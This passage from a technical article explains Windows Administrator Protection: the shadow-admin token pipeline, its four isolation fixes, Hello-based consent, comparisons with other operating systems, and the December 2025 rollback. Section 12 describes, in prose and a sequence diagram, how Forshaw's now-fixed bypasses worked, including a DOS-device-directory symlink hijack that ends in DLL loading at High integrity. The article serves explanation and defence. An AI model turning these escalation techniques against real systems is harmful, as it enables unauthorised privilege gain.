appinfo.dll's RAiLaunchAdminProcess RPC endpoint, hosted inside the Application Information service in svchost.exe, receives the call [@ms-uac-how-it-works].
appinfo reads HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\TypeOfAdminApprovalMode.
If the value is 2 (Admin Approval Mode with Administrator Protection), appinfo reads the calling user's SAM record, locates the ShadowAccountForwardLinkSid attribute, and validates the corresponding ShadowAccountBackLinkSid on the SMAA's SAM record. The linkage check is what binds a given elevated process to a given primary user; without both attributes pointing at each other, the elevation is refused [@call4cloud-osint].
appinfo launches consent.exe on the secure desktop in credential prompt mode rather than the classic Yes/No mode. The prompt asks the primary user to authenticate via Windows Hello (PIN, fingerprint, face, or password fallback), not the SMAA. The SMAA has no human credentials. The Windows Developer Blog states the property explicitly [@ms-developer-blog-2025], and Forshaw's January 2026 post restates it in operational terms: "The user does not need to know the credentials for the shadow administrator as there aren't any. Instead UAC can be configured to prompt for the limited user's credentials, including using biometrics if desired" [@forshaw-pz-jan2026].
On a positive Hello result, appinfo.dll -- running as NT AUTHORITY\SYSTEM inside the Application Information service -- asks the kernel to ask LSA for a fresh primary access token for the SMAA's SID in a brand-new logon session. The LSA logon is credential-less. The kernel asks LSA to authenticate "a new instance of the shadow administrator," and LSA fulfils the request without any SMAA credential because the SMAA has no credential to verify. The trust architecture mirrors the way the Service Control Manager asks LSA for service-account tokens: SCM is trusted to ask for the token; LSA mints it on the strength of the request rather than on the strength of any credential. In Administrator Protection, appinfo.dll is the trusted requester, and its request is gated on the user-side Hello result it received in step 5. The Forshaw verbatim that anchors the mechanism is below this section [@forshaw-pz-jan2026, @ms-developer-blog-2025].
appinfo calls CreateProcessAsUser with the SMAA token, the user's requested executable, and the SMAA's profile environment block (USERPROFILE=C:\Users\ADMIN_<random>, USERNAME=ADMIN_<random>, the SMAA's NTUSER.DAT mapped as HKCU).
The new process loads at High integrity, holding the SMAA's primary token, in a fresh logon session with a freshly minted authentication-ID LUID. The DOS device directory at \Sessions\0\DosDevices\<LUID> does not yet exist; the kernel will create it on first reference.
Subsequent SeAccessCheck calls on system objects evaluate against the SMAA's local Administrators group membership and succeed. The elevated process can write to HKLM, modify program files, install services, load WHQL-signed drivers (subject to App Control for Business and HVCI), and otherwise behave as a member of the Administrators group [@ms-developer-blog-2025].

The mechanism by which the Local Security Authority mints a primary access token for the SMAA without verifying any SMAA credential. `appinfo.dll`, running as `NT AUTHORITY\SYSTEM` inside the Application Information service, requests the logon on the SMAA's behalf after the primary user has succeeded against the Hello credential gate. LSA fulfils the request because the *requester* is trusted; the architecture mirrors the way the Service Control Manager requests service-account tokens. The "credential-less" label is descriptive of the SMAA side of the exchange: the SMAA never has a human credential to verify, so LSA cannot and does not ask for one [@forshaw-pz-jan2026, @ms-developer-blog-2025].

The trust architecture is not new in Administrator Protection. The Service Control Manager has asked LSA for service-account tokens since Windows NT 3.1 in 1993; LSA accepts the request because SCM is the trusted requester, not because the service account presented a credential. Administrator Protection generalises the same pattern to elevation: appinfo.dll is the trusted requester, and the SMAA is its functional analogue of a service account. What is new is the user-side gate -- the trusted requester only makes the request after a positive Hello result on the primary user's credential.

in Administrator Protection the kernel calls into the LSA and authenticates a new instance of the shadow administrator. This results in every token returned from `TokenLinkedToken` having a unique logon session, and thus does not currently have the DOS device object directory created. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

The "unique logon session" property in Forshaw's quote is exactly the structural property the lazy-DOS-device-directory bypass exploits, and §12 walks that exploit in full. For now, the load-bearing observation is the credential-less logon itself: the SMAA token is real, the logon session is real, the integrity level is real, but no SMAA credential ever changes hands. The trust is in the requester, gated by a Hello gesture from the primary user.

sequenceDiagram participant User as User shell (primary admin filtered token) participant AppInfo as appinfo.dll (NT AUTHORITY\SYSTEM) participant SAM as samsrv.dll / SAM database participant Consent as consent.exe (secure desktop) participant Hello as Windows Hello / TPM participant LSA as LSASS participant Elev as Elevated SMAA process

User->>AppInfo: ShellExecute "as admin"
AppInfo->>AppInfo: RAiLaunchAdminProcess RPC
AppInfo->>AppInfo: Read TypeOfAdminApprovalMode = 2
AppInfo->>SAM: Resolve ShadowAccountForwardLinkSid
SAM-->>AppInfo: SMAA SID + backlink check OK
AppInfo->>Consent: Launch consent.exe (credential mode)
Consent->>Hello: Request Hello gesture for primary user
Hello-->>Consent: PIN / biometric / password verified
Consent-->>AppInfo: Approved
AppInfo->>LSA: Credential-less logon for SMAA (trusted-requester pattern)
LSA-->>AppInfo: Fresh SMAA primary token and fresh LUID
AppInfo->>Elev: CreateProcessAsUser with SMAA token and profile
Note over Elev: Different SID and USERPROFILE and HKCU and LUID
Note over Elev: Integrity level High -- DOS device dir not yet created

A practical illustration of the shift, displayed as the diff between the pre-AP and post-AP elevated console session.

{` // Modelled output of 'whoami /all' run from an elevated console. // Before: TypeOfAdminApprovalMode = 1 (classic UAC). // After: TypeOfAdminApprovalMode = 2 (Administrator Protection).

const before = { user: 'CONTOSO\\alice', sid: 'S-1-5-21-123456789-987654321-1122334455-1001', profile: 'C:\\Users\\alice', authId: '0x3e7:0x000abcde', integrity: 'S-1-16-12288 (High)', groups: ['BUILTIN\\Administrators (Enabled)'] };

const after = { user: 'WIN11-PC\\ADMIN_9f2c7e1bdc4a8033', sid: 'S-1-5-21-123456789-987654321-1122334455-1051', profile: 'C:\\Users\\ADMIN_9f2c7e1bdc4a8033', authId: '0x3e7:0x000abf42', integrity: 'S-1-16-12288 (High)', groups: ['BUILTIN\\Administrators (Enabled)'], shadowBacklink: 'CONTOSO\\alice' };

console.log('Different user name:', before.user !== after.user); console.log('Different SID:', before.sid !== after.sid); console.log('Different profile:', before.profile !== after.profile); console.log('Different LUID:', before.authId !== after.authId); console.log('Same integrity:', before.integrity === after.integrity); `}

The pipeline is now a single chain of named function calls. The next section asks what changed about the four shared-resource properties from §3, and which UAC-bypass family each fix forecloses.

8. The four shared-resources fixes, precisely

Each of the four shared resources from §3 maps to a precise Administrator Protection fix, and each fix maps to a named UAC-era attack class it forecloses.

Shared resource (UAC)	Administrator Protection fix	UAC-era attack class foreclosed
Same SID across both tokens	SMAA has its own SID; no shared user identity	Same-user file and registry ACE confusion
Same `%USERPROFILE%`	SMAA has `C:\Users\ADMIN_<random>\`	DLL side-load family (sysprep / CRYPTBASE)
Same `HKCU` hive	SMAA has its own `NTUSER.DAT`	Registry-hijack family (eventvwr, fodhelper, sdclt)
Same logon-session LUID	SMAA gets a fresh LUID per elevation	Token-theft via `TokenLinkedToken`; logon-session DOS device hijack

Profile separation. The SMAA owns its own %USERPROFILE% directory tree under C:\Users\ADMIN_<random>\. Files created by elevated processes land there by default. Library folder divergence is the most visible consequence: an elevated Notepad's File > Save dialog opens at the SMAA's Documents, not the primary user's. The primary user cannot see those files in their own Explorer without explicit cross-profile navigation. The structural property that closes is the writable-shared-directory premise of the Davidson 2009 DLL side-load family. Sysprep + CRYPTBASE was a profile-shared attack; without a shared profile, the elevated binary searches a different directory tree from the one the limited user can write to [@ms-developer-blog-2025].

Registry separation. The SMAA's HKCU maps to the SMAA's NTUSER.DAT, not the primary user's. When eventvwr.exe, running in an SMAA process, queries HKCU\Software\Classes\mscfile\shell\open\command, it reads the SMAA's hive, not the primary user's. The primary user has no write access to the SMAA's NTUSER.DAT. The entire registry-hijack family -- eventvwr / mscfile [@enigma0x3-2016-eventvwr], fodhelper / ms-settings, sdclt / IsolatedCommand [@enigma0x3-2017-sdclt], sdclt / App Paths [@enigma0x3-2017-app-paths] -- forecloses on the same property: the elevated binary's HKCU lookup walks a hive the attacker does not control [@ms-developer-blog-2025].

Logon-session separation. Every SMAA elevation gets a fresh authentication-ID LUID. The Local Security Authority allocates a new logon session for each elevation; when the elevated process exits, the session is reaped. Per-logon-session kernel resource caches, including the DOS device object directory at \Sessions\0\DosDevices\<LUID> and the credential cache, do not flow across the boundary. Token handles cannot be reused. Drive-letter overrides under the limited user's logon session do not appear in the SMAA's session [@forshaw-pz-jan2026].

No auto-elevation. The autoElevate=true manifest attribute is no longer honoured by appinfo.dll under TypeOfAdminApprovalMode = 2. Every elevation that previously went silent now prompts. The Windows Developer Blog states the change directly: "With administrator protection, all auto-elevations in Windows are removed and users need to interactively authorize every admin operation" [@ms-developer-blog-2025]. Forshaw's January 2026 framing of the consequence: "as auto-elevation is no longer permitted they will always show a prompt, therefore these are not considered bypasses" [@forshaw-pz-jan2026]. This is the single most consequential fix in the design. The auto-elevation whitelist was the bypass; removing the whitelist eliminates the class at the source, including the entire silent-elevation primitive class that Forshaw's older RAiProcessRunOnce research relied on.

Multi-user separation is the original UNIX privilege model. The `root` user holds privilege; ordinary users do not; the boundary between them is the file-permission system enforced by the kernel. Windows NT shipped the same primitives in 1993 -- discretionary access control lists on every securable object, per-user profiles, multi-user logon sessions -- but the surrounding culture treated Administrator-as-default as the path of least resistance. The architectural sophistication in Administrator Protection is in *linkage* (the SAM forward / back attributes), *lifecycle* (provisioning on policy enable, teardown on process exit), and *enforcement* (removal of auto-elevation as a mechanism). The primitives themselves are old.

The four fixes share a property. Each one breaks a shared resource that an attacker depends on. But there is one more piece of the redesign that has not yet been described: the prompt itself is no longer a Yes/No click-through. The next section asks what happens when the consent UI becomes a credential.

9. Windows Hello as the consent gate

The classic UAC prompt is a Yes / No on the secure desktop. Administrator Protection turns the prompt into a credential prompt for the primary user's Windows Hello: a PIN, a fingerprint, a face match, or a password fallback. The credential is for the primary user, not the SMAA, because the SMAA has no human credentials; the Hello verification is what authorises the cross-profile elevation [@ms-admin-protection, @ms-developer-blog-2025, @forshaw-pz-jan2026].

To talk precisely about what the gate does, name the primitive it closes. Under classic UAC, the consent prompt treated a click on the secure desktop as sufficient evidence of consent; physical presence was the entire evidence requirement. That primitive shows up in three sub-cases that the UAC literature has documented for two decades.

The primitive by which the legacy UAC consent dialog accepted a click on the secure desktop as sufficient evidence of consent, without verifying *who* clicked. Three operational sub-cases follow. *Unattended-session click-through* -- an attacker (or co-located third party) with brief physical access to an unlocked screen showing a UAC prompt clicks Yes on the presumption that whoever is at the keyboard is the legitimate user. *Habituated-click click-through* -- the legitimate user has clicked Yes on hundreds of UAC prompts and clicks one more without conscious attention. *Pretext click-through* -- a malicious application argues a legitimate-looking case to the user and elicits the Yes click. Administrator Protection's credential gate cost-raises all three sub-cases without fully eliminating any [@forshaw-pz-jan2026, @ms-admin-protection].

Unattended-session click-through. An attacker who walks up to an unlocked screen showing a UAC prompt can click Yes and elevate. The legitimate user has authenticated; the prompt assumes the person at the keyboard is the legitimate user. Post-AP, the click is not sufficient. The Hello biometric or PIN is required, and the attacker (who does not know either) cannot complete the gesture. Microsoft's Ignite 2024 framing addresses this primitive implicitly with "elevation rights only when needed" and "interactively authorize every admin operation" [@bleepingcomputer-2024].

Habituated-click click-through. A user who has clicked Yes on hundreds of UAC prompts over the course of a year clicks Yes on a malicious one as reflex. The classic UAC prompt requires no attentional engagement beyond physical presence and a click. Hello's gesture (a four-digit PIN entry, a fingerprint press, a face-recognition glance) is higher-friction and harder to perform inattentively. The Windows Developer Blog frames the property as "just-in-time administrator privileges, incorporating Windows Hello to enhance both security and user convenience" [@ms-developer-blog-2025].

Pretext click-through. A malicious application that argues its case to the user -- a fake installer, a re-skinned setup utility, a Trojan masquerading as a legitimate update -- can elicit a Yes click pre-AP. Post-AP, the user is also asked for a credential, which is a stronger user-side check. The user is more likely to interrogate "why am I being asked for my PIN again?" than "why is a prompt appearing?" Microsoft Learn captures the intent as "users are aware of potentially harmful actions before they occur, providing an extra layer of defense against threats" [@ms-admin-protection].

None of the three sub-cases is fully eliminated. Forshaw is explicit that visible-prompt bypasses are not classified as security vulnerabilities by Microsoft's design-document position: bypasses that result in a visible prompt are not security bulletins, because the user could equivalently have launched the prompt themselves [@forshaw-pz-jan2026]. What the gate does is cost-raise each sub-case. The unattended-screen attack requires a stolen PIN or coerced biometric. The habituated user must perform a gesture they cannot perform inattentively. The pretext attack must justify the second authentication, not just the first.

What it does not close is worth naming, because three primitives that look like they belong on the credential gate's account sheet were already closed by independent mechanisms, and the article should say so to avoid the common over-attribution mistake.

Synthetic-keystroke SendInput against consent.exe. Already closed by UIPI in Vista 2006, and doubly closed by the secure-desktop switch to Winsta0\Winlogon. Even UI Access processes -- whose purpose is to bypass UIPI for accessibility -- cannot reach into the secure desktop [@forshaw-pz-feb2026].
Headless UI Automation against the prompt. Same UIPI / secure-desktop boundary closes it. Redundant with respect to the credential gate.
CVE-2019-1388-class UI-interaction paths surfaced through the prompt's own UI. Closed by Microsoft's November 2019 HHCtrl patch and the cert-viewer UI redesign, prior to any Administrator Protection development [@nvd-cve-2019-1388].

The credential is hardware-rooted via TPM or Pluton on capable hardware. The PIN is unsealed only under the user's gesture; the biometric flows through Enhanced Sign-in Security (ESS) on capable hardware; the credential itself never leaves the Trusted Platform Module or Pluton enclave when ESS is engaged [@ms-windows-hello-ess]. The detail of the Hello architecture itself -- FIDO2 attestation, the ngc protector, the ESS isolation path through the Secure Kernel -- belongs to the Windows Hello article in this series, and is not re-derived here.

The new risk the gate does not close is the obvious one. Phishing the prompt now phishes a real credential, not just consent. A malicious application that can convince the user to authenticate on its behalf gets the elevation the user would otherwise have given to a legitimate request. The credential remains hardware-rooted and is not exfiltrated to the malware, but the elevation produces a working SMAA token in the attacker's process. This is the surface §15 carries forward to open problems.

Key idea: The credential gate closes one specific primitive: consent-without-identity-verification. It cost-raises three sub-cases (unattended-session, habituated-click, pretext click-through) without eliminating any. The structural boundary is profile separation plus fresh logon session plus auto-elevation removal; the credential gate is the fourth, defence-in-depth, property that ensures the boundary cannot be silently crossed by anyone holding only the limited user's physical access.

The prompt is a credential gate, but it remains a UI element. The next section asks how this elevation model compares to what other operating systems do.

10. Competing approaches: what other operating systems do

Three one-paragraph treatments. The article does not re-derive each system; it positions Administrator Protection against the field.

Linux: sudo plus PolKit pkexec plus PAM modules. The authority model on Linux is file-based. /etc/sudoers (or its LDAP equivalent) is the policy table; the sudoers plugin reads it and decides whether to permit a given user to run a given command [@sudo-ws-sudoers]. PolKit -- polkitd and its authentication-agent helpers -- is the parallel mechanism for GUI privileged-service requests, with actions and mechanisms separated in the polkit configuration files [@polkit-docs]. Biometric integration arrives through the PAM stack: pam_fprintd for fingerprint, pam_u2f for FIDO2 tokens, pam_yubico for Yubikeys. There is no profile separation by default; sudo -i switches HOME to root's home directory but does not separate per-elevation. The model is per-command authorisation, not per-account isolation.

macOS: Authorization Services plus Touch ID via pam_tid. GUI elevation prompts are gated by authorizationdb, a property-list-format policy database whose rules name which credentials (admin password, Touch ID, system-wide entitlements) authorise which actions [@apple-auth-services]. Touch ID is verified by the Secure Enclave Processor; the credential never leaves the SEP, and Authorization Services integrates with pam_tid to allow sudo invocations to use the gesture [@apple-pam-tid]. There is no separate admin profile; Transparency, Consent, and Control (TCC) guards privileged resource access at the per-action level, not the per-profile level. The Mac architecture privileges hardware-rooted consent (Touch ID, Secure Enclave) over account separation.

Microsoft's own sudo.exe (Windows 11 24H2). An inbox terminal transport that triggers the existing UAC or Administrator Protection pipeline; not an alternative to either [@ms-sudo-docs]. The forceNewWindow mode opens an elevated console in a new window. The disableInput mode keeps the elevated console in the current window but blocks keyboard input to it from the unelevated terminal. The normal (inline) mode preserves POSIX-style pipes between the unelevated and elevated processes. Microsoft Learn warns explicitly about the inline mode: "Sudo for Windows can be used as a potential escalation of privilege vector when enabled in certain configurations" [@ms-sudo-docs]. The mechanism is RPC between the unelevated and elevated sudo.exe processes; the elevation itself still goes through appinfo.dll.

Intune Endpoint Privilege Management (EPM). Cloud-policy-driven virtual-account elevation [@ms-epm-overview]. EPM performs elevation via a virtual account that is not a member of the local Administrators group; the elevation rights are conferred only for the duration of the policy-permitted action. Three elevation modes are available: Automatic (no user interaction), User-confirmed (a prompt), and Elevate as Current User (the action runs as the user's elevated identity rather than the virtual account). EPM is architecturally complementary to Administrator Protection: EPM is the enterprise policy story, Administrator Protection is the per-device architecture story. The two can coexist on the same device.

The distinguishing property of Administrator Protection in this comparison is whole-profile separation: the SMAA's own profile, the SMAA's own HKCU, the SMAA's own library folders, plus a fresh logon session per elevation. Neither Linux sudo nor macOS Authorization Services provides that property as a default desktop primitive. EPM provides per-elevation isolation via the virtual account but does not give the elevated process a persistent profile, which is what makes Administrator Protection's compatibility story so different from EPM's.

Administrator Protection is the architecturally tightest desktop elevation model now in production. The next section asks where the boundary still leaks.

11. Theoretical limits: what Administrator Protection cannot fix

Four structural ceilings.

Showing a prompt is not crossing the boundary. Microsoft's design position is explicit: bypasses that result in a visible elevation prompt are not security bulletins, because the user could equivalently have right-clicked "Run as administrator." Forshaw's January 2026 post states the position verbatim: "I expect that malware will still be able to get administrator privileges even if that's just by forcing a user to accept the elevation prompt" [@forshaw-pz-jan2026]. The operational consequence is that social-engineering the consent dialog remains a structural attack surface. The prompt is a UI element. The boundary is the credential gate. The gate is only as strong as the user's resistance to whatever pretext induces them to authenticate.

The MSRC servicing-criteria definition of a security boundary: a logical separation between code or data of different trust levels, intended to be enforced by the operating system and accompanied by a Microsoft commitment to issue a security update when an unauthorised crossing is found. UAC under the classic split-token model is classified as a *security feature*, not a boundary; bypasses receive quality-fix attention but not security-bulletin attention. Administrator Protection is the first elevation mechanism classified as a security boundary, with bulletin-grade fixes when it fails [@msrc-servicing-criteria, @forshaw-pz-jan2026].

Admin equals kernel. Once code is running inside an SMAA elevated process, it has the local Administrators group; it can write to HKLM; it can install services; it can load WHQL-signed drivers; it can call into kernel-mode interfaces gated by SeLoadDriverPrivilege and the App Control for Business policy. The MSRC servicing-criteria position that "admin-to-kernel is not a security boundary" continues to apply inside the SMAA [@msrc-servicing-criteria]. Administrator Protection makes the path to admin into a boundary; it does not change the relationship between admin and kernel. Driver-loading controls remain the domain of WHQL signing, the Microsoft Vulnerable Driver Blocklist (default-on in Windows 11 since the 2022 update), App Control for Business policies, and Hypervisor-protected Code Integrity (HVCI) [@ms-vuln-driver-blocklist]. The App Identity article in this series covers the App Control mechanism in detail.

The SMAA is in the local Administrators group. Discretionary access control list-based exposures of admin-only resources -- CREATOR OWNER ACEs on persistent objects, world-writable DACLs on certain \Sessions\0\DosDevices entries, default-permissive ACLs on a handful of legacy registry trees -- still grant the SMAA full access. The boundary is between standard user and SMAA, not between SMAA and SYSTEM. The SMAA is a high-privilege actor inside the operating system; the relationship between it and the rest of the privileged surface is unchanged.

Out of scope per Microsoft Learn. Remote logon, roaming profiles, backup-admin accounts, Managed Service Accounts and group Managed Service Accounts (MSAs and gMSAs), virtual accounts for services, and domain-admin scenarios are explicitly outside the Administrator Protection model in its current form [@ms-admin-protection]. The feature is local-machine-only, interactive-admin-only. Domain administrators who log into a workstation will not see the SMAA path; service accounts under LOCAL SERVICE, NETWORK SERVICE, or IIS_IUSRS are unaffected.

Key idea: A genuine architectural ceiling on consent-prompt elevation: the prompt is a UI element; the boundary is the credential gate; the gate is only as strong as the user's resistance to social engineering. Closing the gap requires out-of-band consent (smartcard, phone push) or per-action policy without human consent in the loop (EPM's automatic mode). Neither is the default.

Four limits, four sentences. The next section walks the concrete evidence of what actually leaked in the pre-GA Insider Preview builds, and what Microsoft did about it.

12. Forshaw's nine bypasses, classified

Between October 2024, when Administrator Protection first appeared in Insider Preview build 27718, and October 2025, when KB5067036 made the feature available on stable Windows, James Forshaw of Google Project Zero audited the mechanism and found nine separate silent-bypass paths. Microsoft fixed all nine -- either in the KB5067036 ship or in subsequent security bulletins [@forshaw-pz-jan2026]. The fact pattern is the structural confirmation that Administrator Protection is now treated as a security boundary. Under the UAC classification, none of those nine would have received CVEs. Each one would have been a quality bug. The bypass canon ran for twenty years without bulletins. The fact that the first cohort of Administrator Protection bypasses produced nine bulletin-eligible fixes is exactly the change in posture the classification change implies.

All the issues that I reported to Microsoft have been fixed, either prior to the feature being officially released (in optional update KB5067036) or as subsequent security bulletins. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

Walk the nine as three classes.

The lazy DOS device directory hijack

The single most interesting vulnerability in the feature's history; Forshaw's January 26, 2026 deep analysis [@forshaw-pz-jan2026]; Project Zero issue 432313668 [@pz-issue-432313668]. The mechanism turns on a behaviour change Administrator Protection itself introduced. Every SMAA elevation gets a fresh logon session, which means the per-logon-session DOS device object directory at \Sessions\0\DosDevices\<LUID> is not created at SMAA logon time. The kernel routine SeGetTokenDeviceMap creates the directory lazily, on the first reference. The owner of the new directory is the owner of the access token that triggered the creation [@forshaw-pz-jan2026, @theregister-2026].

The impersonation level (`SecurityIdentification`) at which an impersonating thread can read security information about the impersonated token -- the SID set, the privilege set -- but cannot perform privileged operations or open kernel objects as the impersonated user. The kernel allows access checks to consult an identification-level token for *reading* the security information; certain code paths inadvertently use that information for *granting* operations, which is the structural primitive Forshaw's lazy DOS device directory exploit depends on [@forshaw-pz-jan2026].

The SECURITY_IMPERSONATION_LEVEL enumeration in winnt.h defines four levels in ascending order: SecurityAnonymous (value 0), SecurityIdentification (1), SecurityImpersonation (2), SecurityDelegation (3). SecurityIdentification is the second-lowest -- it sits one above SecurityAnonymous -- and is the level Windows uses when it wants to ask the kernel "what would this token be allowed to do?" without actually doing the operation. The trap is when a code path that runs as the caller uses an identification-level impersonation to read a token property -- here, the linked-token field -- and the resulting object inherits the caller's owner SID rather than the impersonated token's.

The exploit chain. An attacker running as the primary user (filtered token, Medium integrity) starts an elevation. Before the SMAA process touches its DOS device directory, the attacker impersonates the SMAA's TokenLinkedToken at identification level and triggers a code path that walks the directory. The kernel creates \Sessions\0\DosDevices\<SMAA_LUID> lazily; in the affected code path, the owner of the new directory becomes the attacker's primary token's owner SID rather than the SMAA's.

The attacker plants a C: symbolic link inside the directory pointing at an attacker-controlled location. When the elevated SMAA process loads its DLLs, the resolution walks \Sessions\0\DosDevices\<SMAA_LUID>\C: first; the symlink redirects the load to the attacker's directory; the attacker's DLL runs in the High-integrity SMAA process [@forshaw-pz-jan2026].

sequenceDiagram participant Att as Attacker (limited user) participant Kern as "Kernel (SeGetTokenDeviceMap)" participant SMAA as SMAA elevated process

Note over SMAA: Fresh logon session -- DOS device dir not yet created
Att->>Att: Impersonate SMAA TokenLinkedToken at Identification level
Att->>Kern: Reference \Sessions\0\DosDevices\<SMAA_LUID>
Kern->>Kern: Lazy-create directory
Note over Kern: Owner SID inherited from impersonating token
Att->>Kern: Create C: symlink under attacker control
SMAA->>Kern: Resolve C: at first DLL load
Kern-->>SMAA: Returns attacker symlink target
SMAA->>SMAA: Load attacker DLL at High integrity

What makes this bypass extraordinary is that it is caused by the feature's design. Pre-Administrator-Protection, the user's primary logon session was created at desktop logon and the DOS device directory existed before any elevation. Lazy directory creation never came up. The SMAA design's "fresh logon session per elevation" property -- the same property Forshaw's January 2026 pull-quote in §7 establishes via the credential-less LSA logon -- is exactly the precondition the lazy-creation path exploits.

Microsoft's pre-GA fix has two parts. First, the manifest-parsing access check uses the SYSTEM-impersonating-the-low-user identity rather than the user's primary token. Second, the DOS device directory is materialised with the correct owner before any user-controlled code path can trigger the lazy-creation path [@forshaw-pz-jan2026]. The Register's coverage of the disclosure noted "the most notable of the nine bugs he reported was a Logon Sessions flaw that relied upon five different Windows behaviors. He added that he likely only found it because he was previously familiar with the OS's 'weird behavior when creating the DOS device object directory'" [@theregister-2026].

The five UI Access bypasses

Forshaw's February 2026 post details the second class, comprising five of the nine bypasses [@forshaw-pz-feb2026]. UI Access is a token flag retrofitted in Vista to let accessibility applications cross UIPI. To qualify, an executable needs three things: a manifest declaring uiAccess="true", a trusted code-signing certificate, and an installation location under an administrator-only directory (typically %ProgramFiles%). The Application Information service's RAiLaunchAdminProcess endpoint launches qualifying UI Access processes without showing the consent prompt, on the theory that the three-criteria check is itself sufficient evidence of administrator approval [@forshaw-pz-feb2026].

The token flag (`TOKEN_UIACCESS`) that allows a process to interact with windows of higher integrity level than its own, bypassing User Interface Privilege Isolation. UI Access is meant for accessibility software (screen readers, on-screen keyboards) that needs to interact with elevated UI. To qualify, an executable must carry a `uiAccess="true"` manifest, a trusted code-signing certificate, and an administrator-only installation directory; qualifying processes run without showing the consent prompt and at integrity level High [@forshaw-pz-feb2026].

Under classic UAC, a UI Access process ran with the filtered standard-user token bumped from Medium to High integrity -- not with the full admin token. Forshaw's February 2026 post states the mechanism verbatim: "the service will take a copy of the caller's access token, enable the UI Access flag and increase the integrity level... If the caller is a limited user of an UAC administrator it will set the integrity level to High" [@forshaw-pz-feb2026].

Under Administrator Protection, the pre-GA design preserved that behaviour unchanged: the UI Access process inherited the limited user's primary token (not the SMAA's), bumped to High integrity. That decision was the structural flaw. A High-integrity process under the limited user can interact with the SMAA's windows whenever a High-integrity SMAA process exists on the same desktop, send messages to them, read clipboard data, and -- through GetProcessHandleFromHwnd -- obtain a process handle on the SMAA process that lets the limited-user process inject code into it.

The five UI Access variants exploit different sub-categories of the same structural property. The Quick Assist binary, a remote assistance application on Windows 10 and 11 that carries the uiAccess flag, is one such variant; R41N3RZUF477 published a public proof-of-concept that exploits the BrowserExecutableFolder group policy to make Quick Assist load WebView2 from an attacker-controlled directory [@quickassist-bypass]. The remaining four exploit, respectively, weaknesses in the secure-application-directory check, the manifest parsing routine, COM marshalling in UI Access contexts, and message-only window handling [@forshaw-pz-feb2026].

Microsoft's pre-GA fix is structural: UI Access processes no longer run as the limited user. They are created with a filtered copy of the SMAA's token (the SMAA's SID, the SMAA's profile, but with SeLoadDriverPrivilege and similar removed). Profile separation is restored at the cost of a more complex token-creation path [@forshaw-pz-feb2026].

The remaining three: implementation flaws

The third class -- three bypasses described by Forshaw only as "implementation flaws and long-standing UAC issues" -- is not detailed publicly [@forshaw-pz-jan2026]. The article does not invent details. Forshaw names the category and cites the framing; the engineering specifics are presumably in Microsoft Security Response Center advisories or are still under disclosure. What can be said is that two of the three appear from Forshaw's framing to be UAC-era bugs that Administrator Protection inherited rather than introduced, and one is an Administrator-Protection-specific implementation flaw.

The bypass canon ran for twenty years without bulletins. The fact that all nine pre-GA Administrator Protection bypasses received fixes -- including a deep one rooted in the feature itself -- is the structural confirmation that the elevation path is now a boundary. The next section asks why Microsoft pulled the feature in December 2025.

13. The compatibility surface and the December 2025 revert

About one month after KB5067036 made Administrator Protection available, Microsoft pulled it. Forshaw, writing in January 2026, gives the canonical attribution: "As of 1st December 2025 the Administrator Protection feature has been disabled by Microsoft while an application compatibility issue is dealt with. The issue is unlikely to be related to anything described in this blog post so the analysis doesn't change" [@forshaw-pz-jan2026]. Microsoft Learn confirms: "The feature previously listed in the October 2025 non-security update (KB5067036) has been reverted and will roll out at a later date" [@ms-admin-protection, @ms-kb5067036].The November 2025 KB5067036 amendment is worth knowing. Microsoft included an unrelated fix for an AutoCAD MSI-repair UAC-prompt regression in the same cumulative; that fix shipped and was not reverted. The WebView2 installer regression is what caused the Administrator Protection revert specifically [@ms-kb5067036].

The structural causes. The Windows Developer Blog (May 2025) [@ms-developer-blog-2025] enumerates the surface where applications break under the SMAA model.

Single sign-on does not cross. Domain and Microsoft Entra credentials cached for the primary user's session are not available inside the SMAA's session. Any elevated process touching Microsoft Graph, Entra ID, or Kerberos-protected resources must re-authenticate. The login dialogs an elevated installer triggers are not failures of the application; they are consequences of the separated logon session.
Network drives do not carry. Drive-mapping in the primary user's session is not inherited by the SMAA. Installers that mount network shares to install per-machine components break. The workaround for affected installers is to use UNC paths directly rather than drive letters.
Library folders diverge. Files saved to Documents, Desktop, Downloads, or Pictures from an elevated app land in C:\Users\ADMIN_<random>\ rather than the primary user's home. A user clicks Save in an elevated text editor and saves to "Documents"; from their own Explorer, the file is invisible.
HKCU diverges. Application settings -- theme, recent-files lists, per-user COM registrations, last-opened paths -- live in the SMAA's HKCU, not the primary user's. The canonical example in Microsoft's documentation is Notepad's dark-mode theme [@ms-developer-blog-2025]: the primary user sets the theme; an elevated Notepad opens in the default theme; the two sessions never agree.
WebView2 installers fail. The error message "Microsoft Edge can't read and write to its data directory" is the recognisable symptom of an installer that assumes one shared profile. The WebView2 runtime stores per-user state in AppData\Local\Microsoft\EdgeWebView\ under whichever profile is active at install time; if the runtime is installed under the SMAA's profile and then used by an unelevated application running as the primary user, the data-directory write fails. This is the regression that triggered the December 2025 revert.
Hyper-V and WSL incompatibilities. Microsoft Learn explicitly tells IT administrators not to enable Administrator Protection on devices that require Hyper-V or WSL [@ms-admin-protection].
Visual Studio. Microsoft's own development environment is "not supported in such a configuration" when run elevated. Extensions don't carry; settings don't carry; project-dialog paths point at the SMAA's profile rather than the developer's actual workspace.

Note: Microsoft Learn explicitly excludes Hyper-V and WSL devices from the recommended enablement set [@ms-admin-protection]. Symptoms of incorrect enablement include WSL distribution startup failures (the WSL service runs under a different account from the launching user, and the SMAA's logon-session-isolation properties interact badly with WSL's named-pipe communication) and Hyper-V Manager connection errors that are difficult to attribute to the elevation model.

I guess app compatibility is ultimately the problem here, Windows isn't designed for such a radical change. I'd have also liked to have seen this as a separate configurable mode rather than replacing admin-approval completely. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026] Administrator Protection is the right architecture, and the compatibility surface is the bill of materials for twenty years of admin-as-default assumption. Application developers have written installer logic, theme-persistence code, drive-letter assumptions, and HKCU-shared state into shipping software for two decades, on the structural premise that the elevated process and the unelevated user share a profile. The December 2025 revert is the first iteration's learning round, not a structural failure. The same revert pattern accompanied the Windows Vista UAC rollout in 2006-2007, the Windows 7 auto-elevation introduction in 2009 (which itself softened the Vista prompt fatigue at the cost of the bypass canon), and the Smart App Control rollout in Windows 11 22H2. Microsoft will re-enable Administrator Protection when the WebView2 regression and a handful of installer-pattern fixes have shipped.

